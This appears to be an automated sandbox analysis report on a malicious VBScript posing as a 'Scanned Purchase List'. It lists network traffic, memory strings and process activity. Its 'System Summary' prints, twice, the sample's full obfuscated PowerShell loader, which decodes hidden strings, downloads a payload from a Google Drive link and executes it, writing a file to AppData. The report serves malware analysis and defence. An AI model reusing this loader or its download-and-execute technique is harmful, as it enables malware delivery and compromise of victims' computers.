Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version | Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=* | Content-Length: 1652 | X-GUploader-UploadID: AD-8ljt1RjSv6hgWhcRactfyOsekMzQoC07JjKpaABR2hR8xVe1RT2GaqfvZpggRr918ay4YGoq842yUKA | Server: UploadServer | Set-Cookie: NID=517=TYYrH7PW08eA_e5U2OuC4zmekvTUxL9y9Z0hSYlicR1c__kVJQs5xULdovxIj3IMXPMi_rdS8LNeC_fCziXbKGAjzcMEW4yG8zarYR9db8593BfYRuwpe5m1rfnmNFR8-YVfvaeNQ2W03vkoB6kiM4lLNwH7YtVvhCXyrPd0UQxAzsyZ3d0; expires=Wed, 02-Apr-2025 05:45:42 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none | Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 | Content-Security-Policy: sandbox allow-scripts | Connection: close
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=utf-8 | Cache-Control: no-cache, no-store, max-age=0, must-revalidate | Pragma: no-cache | Expires: Mon, 01 Jan 1990 00:00:00 GMT | Date: Tue, 01 Oct 2024 05:45:48 GMT | P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." | Content-Security-Policy: script-src 'report-sample' 'nonce-_i0DtfREUVVlSIbKtp4JLA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' | Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport | Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version | Cross-Origin-Opener-Policy: same-origin | Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=* | Content-Length: 1652 | X-GUploader-UploadID: AD-8ljtljf0Ewfhqytx9iVo7nmtP2yYDqdRfk7K-KlU9Y2zyHbcMNuBPlWiupVMk9e0Ipjdkp8Lla0uERA | Server: UploadServer | Set-Cookie: NID=517=ayNybyF5N2eBPQYwkElV42dGDAo7dQDQxiFHFSICxvzYeUHQ8Auvb772g32F6tMuhU37CAI3kwDYH70R6YO3RPT0tciihaowI_fgJk0hB8bBGjogaqzZOxwWUoixwbKaXp4mZtGQuSZMsktz1QUq2laaEbkFMssVx1YBcZsGm_RpJq13Zw; expires=Wed, 02-Apr-2025 05:45:48 GMT; path=/; domain=.google.com; HttpOnly | Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 | Content-Security-Policy: sandbox allow-scripts | Connection: close
      Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719163509.000001DC5CAAA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRoot
      Source: wscript.exe, 00000000.00000003.1698462624.000001DC5CCF8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718762752.000001DC5CAC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698462624.000001DC5CCF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698486019.000001DC5CADA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719184508.000001DC5CAC5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698462624.000001DC5CCF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698486019.000001DC5CADA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719163509.000001DC5CAAA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698462624.000001DC5CCF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719163509.000001DC5CAAA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719163509.000001DC5CAAA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTruste
      Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718762752.000001DC5CAC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698462624.000001DC5CCF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698486019.000001DC5CADA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719184508.000001DC5CAC5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: wscript.exe, 00000000.00000003.1698462624.000001DC5CCF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698486019.000001DC5CADA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719163509.000001DC5CAAA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en$
      Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718762752.000001DC5CAC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719184508.000001DC5CAC5000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718762752.000001DC5CAC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719184508.000001DC5CAC5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabE
      Source: wscript.exe, 00000000.00000003.1708284459.000001DC5CB05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?37763f6d4a
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD0EC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD10D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD181E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD03BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD057A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0FC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD14E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0F85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFE7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFE8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0E2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD07A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://drive.google.com
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD10D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD181E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD151F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD03BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD057A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFE8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD07A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
      Source: powershell.exe, 00000001.00000002.3009017913.000001ADDF913000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3009017913.000001ADDFA56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698462624.000001DC5CCF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698486019.000001DC5CADA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719163509.000001DC5CAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
      Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698462624.000001DC5CCF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719163509.000001DC5CAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
      Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718762752.000001DC5CAC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698462624.000001DC5CCF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698486019.000001DC5CADA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719163509.000001DC5CAAA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719184508.000001DC5CAC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADCFAC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADCF8A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADCFAC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000001.00000002.3013440346.000001ADE7FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADCF8A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD14E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: powershell.exe, 00000001.00000002.3009017913.000001ADDFA56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000001.00000002.3009017913.000001ADDFA56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000001.00000002.3009017913.000001ADDFA56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD1135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD181E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googPBjN
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD057A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0FC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0F85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD1135000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFE7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFE8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0E2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD07A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD08F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADCFAC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94P
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD150D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD181E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googhZ
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD181E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFD99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD150D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFD32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFE8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD10D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD03BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD057A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD07A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com(
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD0EC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0782000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD10D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFD41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0775000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD181E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFD3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFD99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD03BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFD7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0786000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD150D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD096E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0C93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0974000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD057A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFD95000.00000004.00000800.00020000.00000000.sdmp, 
powershell.exe, 00000001.00000002.2992339914.000001ADD0D28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADCFAC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000001.00000002.3009017913.000001ADDF913000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3009017913.000001ADDFA56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD14E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD14E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD14E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD14E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD14E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknown | HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.4:49731 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.4:49732 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.4:49749 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.4:49750 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.4:49763 version: TLS 1.2

      System Summary

      Source: Initial file: Call ationsvejledninger.ShellExecute(Endovenous, Coraled, "", "", Cheddite)
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#selvhrdendes Opdrager Hjremarginerne Dundertaler #>;$Usolidere43='Councilmen';<#Herredmmer Plasmagenic Jdindernes suttene Korjambisk decelerationsbanen Udskejelser #>;$Dimit=$host.PrivateData;If ($Dimit) {$Pantagraphic++;}function doublecrossing($spisevgringer253){$Driftsbesparelse=$Gucki+$spisevgringer253.Length-$Pantagraphic;for( $Crunchingly=3;$Crunchingly -lt $Driftsbesparelse;$Crunchingly+=4){$Nikeno+=$spisevgringer253[$Crunchingly];}$Nikeno;}function tramelling($Perhapses){ & ($boligydelsen) ($Perhapses);}$sortkldt=doublecrossing 'talM ,fospazLociDatls il Kna D,/Asy5 ke.Ind0Res Lo,(svaW oiHornfordf noanswA ss sm CoN,jrT s. Art1Epa0so,.vet0,ie;P r shoWpasi enA.y6D g4Hav;C b seexLtr6De 4 lo;Mis oerChev ,r: Ud1Ans2tra1Fer.Ri.0Unl)Les ChaG FrestocNe kUndo Ar/sor2Mur0.au1Lok0 F 0Zef1Pso0 Do1 Pr IdFEmiiVenrTegeModf umocanx a/E.i1Out2Ung1Mos. n0 A. ';$Panservaaben=doublecrossing ' s UDiss PaE AsR.lt- Unap lGTapeBjlnOlet r ';$Encheson=doublecrossing 'Gyrh aatP ntPespKnas Ti:Beh/ i/Le d T.rFrai RevFrieImp. s g Inosl.oMosg Jal steHys.RencAngomidmUn,/ vuPercWhe? 
Kne ndx stp ero rrct tplu=Pred H,ostiwpannsy,lIm oBriaEssd il&KaliF,idE f=h s1LanO DuQTyrEB rlAcc7OveU ,aGsulOPipyUncKsids VaPDecd ,aR npJ Gr9Dis1 eng L wH mqst os,rI ifV T NLinNindRLinsJea6stiPOmbVFur9 ti4Bri ';$Dioxid=doublecrossing ' s.>Fib ';$boligydelsen=doublecrossing 's aistoeAppxs m ';$Manducation='springklaps';$Drinksenes='\Paralytical.Nap';tramelling (doublecrossing 'Otu$Ar gstjl,hooEf.bCl,aCavlBev:Gerc R o Fiu RinepotsaceCamrEvaaLnorBregGr u eelimsVis=Egy$WooeJ.nn olvs l:MedaDmppTw.pPred aaasyrtMaravu.+ yk$ M DHipr eliKilnpeakskasNonepitnPhaeTilsFur ');tramelling (doublecrossing ',or$sozg emlD ro KebA taUnilPra:AcrsI vtImpyG,irE otBindManyRookFa kU ceButr Ln=Pol$ AtEAman.ykcBilhIndes.hsKeeoJobn Pa.Tyns ekpsy,lsleiAb tHav(Bil$ svD.eyiUngoCruxPleiDord To) sc ');tramelling (doublecrossing 'Maw[DifNCamestrtTer.kilsV,le sir Mev FaiBescDaweFerPTheoHypiUndnso.tNskM s.a M ns,maspegsameRidr K ] a: on:Na.sdove ApcHabuPa.r ,riJart apyskuPst,rA coskatA koF,lcAn o NelNon n= Nu kv[ ndNR aeQuatCo . VasPite BacstousynrA gisartLgtyOplPNerrTrao TrtBndoGlucHe oCyclAlaTR gyEkspsa e d]Avo:F r: phTNonlMarsP,e1s o2Idi ');$Encheson=$styrtdykker[0];$Northwardly=(doublecrossing ' Ou$sogGs mLPlaONonBTerAGlaL Or:steLIntIs oGUn H ktT p,a MtGForesl.6 Ma8s,v=optnAarE BawPar-TheostaBMilJIfaE HoC UvTnon EarsF rYLa.s.potFeeED lMHov.DelNK aE untFor.OvewJonEA,sbOplCGelL KeIsenePs nAndT sp ');tramelling ($Northwardly);tramelling (doublecrossing ' Cr$DiaLRe iDkfgL phEmutAfkaRidgEnfeFre6Til8Cir.MarHOvaePa asa.dVapestar sesFag[ un$ConPToraVo n D sBl eConrP lv TuaRa ashob Ade AnnCem].as= p$At s Kao.ntrPhotFikky pltrid K tMis ');$semicolloquially=doublecrossing ' F $.oaLHlei N gRovhReitMi as ng PreBad6Ur.8Fum.strDTypo Prwsydn rulozooAu aFerdan FBetiB ml beeMyo(Pse$ onEOffn Unc mohI
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#selvhrdendes Opdrager Hjremarginerne Dundertaler #>;$Usolidere43='Councilmen';<#Herredmmer Plasmagenic Jdindernes suttene Korjambisk decelerationsbanen Udskejelser #>;$Dimit=$host.PrivateData;If ($Dimit) {$Pantagraphic++;}function doublecrossing($spisevgringer253){$Driftsbesparelse=$Gucki+$spisevgringer253.Length-$Pantagraphic;for( $Crunchingly=3;$Crunchingly -lt $Driftsbesparelse;$Crunchingly+=4){$Nikeno+=$spisevgringer253[$Crunchingly];}$Nikeno;}function tramelling($Perhapses){ & ($boligydelsen) ($Perhapses);}$sortkldt=doublecrossing 'talM ,fospazLociDatls il Kna D,/Asy5 ke.Ind0Res Lo,(svaW oiHornfordf noanswA ss sm CoN,jrT s. Art1Epa0so,.vet0,ie;P r shoWpasi enA.y6D g4Hav;C b seexLtr6De 4 lo;Mis oerChev ,r: Ud1Ans2tra1Fer.Ri.0Unl)Les ChaG FrestocNe kUndo Ar/sor2Mur0.au1Lok0 F 0Zef1Pso0 Do1 Pr IdFEmiiVenrTegeModf umocanx a/E.i1Out2Ung1Mos. n0 A. ';$Panservaaben=doublecrossing ' s UDiss PaE AsR.lt- Unap lGTapeBjlnOlet r ';$Encheson=doublecrossing 'Gyrh aatP ntPespKnas Ti:Beh/ i/Le d T.rFrai RevFrieImp. s g Inosl.oMosg Jal steHys.RencAngomidmUn,/ vuPercWhe? 
Kne ndx stp ero rrct tplu=Pred H,ostiwpannsy,lIm oBriaEssd il&KaliF,idE f=h s1LanO DuQTyrEB rlAcc7OveU ,aGsulOPipyUncKsids VaPDecd ,aR npJ Gr9Dis1 eng L wH mqst os,rI ifV T NLinNindRLinsJea6stiPOmbVFur9 ti4Bri ';$Dioxid=doublecrossing ' s.>Fib ';$boligydelsen=doublecrossing 's aistoeAppxs m ';$Manducation='springklaps';$Drinksenes='\Paralytical.Nap';tramelling (doublecrossing 'Otu$Ar gstjl,hooEf.bCl,aCavlBev:Gerc R o Fiu RinepotsaceCamrEvaaLnorBregGr u eelimsVis=Egy$WooeJ.nn olvs l:MedaDmppTw.pPred aaasyrtMaravu.+ yk$ M DHipr eliKilnpeakskasNonepitnPhaeTilsFur ');tramelling (doublecrossing ',or$sozg emlD ro KebA taUnilPra:AcrsI vtImpyG,irE otBindManyRookFa kU ceButr Ln=Pol$ AtEAman.ykcBilhIndes.hsKeeoJobn Pa.Tyns ekpsy,lsleiAb tHav(Bil$ svD.eyiUngoCruxPleiDord To) sc ');tramelling (doublecrossing 'Maw[DifNCamestrtTer.kilsV,le sir Mev FaiBescDaweFerPTheoHypiUndnso.tNskM s.a M ns,maspegsameRidr K ] a: on:Na.sdove ApcHabuPa.r ,riJart apyskuPst,rA coskatA koF,lcAn o NelNon n= Nu kv[ ndNR aeQuatCo . VasPite BacstousynrA gisartLgtyOplPNerrTrao TrtBndoGlucHe oCyclAlaTR gyEkspsa e d]Avo:F r: phTNonlMarsP,e1s o2Idi ');$Encheson=$styrtdykker[0];$Northwardly=(doublecrossing ' Ou$sogGs mLPlaONonBTerAGlaL Or:steLIntIs oGUn H ktT p,a MtGForesl.6 Ma8s,v=optnAarE BawPar-TheostaBMilJIfaE HoC UvTnon EarsF rYLa.s.potFeeED lMHov.DelNK aE untFor.OvewJonEA,sbOplCGelL KeIsenePs nAndT sp ');tramelling ($Northwardly);tramelling (doublecrossing ' Cr$DiaLRe iDkfgL phEmutAfkaRidgEnfeFre6Til8Cir.MarHOvaePa asa.dVapestar sesFag[ un$ConPToraVo n D sBl eConrP lv TuaRa ashob Ade AnnCem].as= p$At s Kao.ntrPhotFikky pltrid K tMis ');$semicolloquially=doublecrossing ' F $.oaLHlei N gRovhReitMi as ng PreBad6Ur.8Fum.strDTypo Prwsydn rulozooAu aFerdan FBetiB ml beeMyo(Pse$ onEOffn Unc mohIJump to behavior
      Source: Scanned Purchase List.vbsInitial sample: Strings found which are bigger than 50
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5292
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5292Jump to behavior
      Source: classification engineClassification label: mal92.expl.evad.winVBS@4/5@3/3
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Paralytical.NapJump to behavior
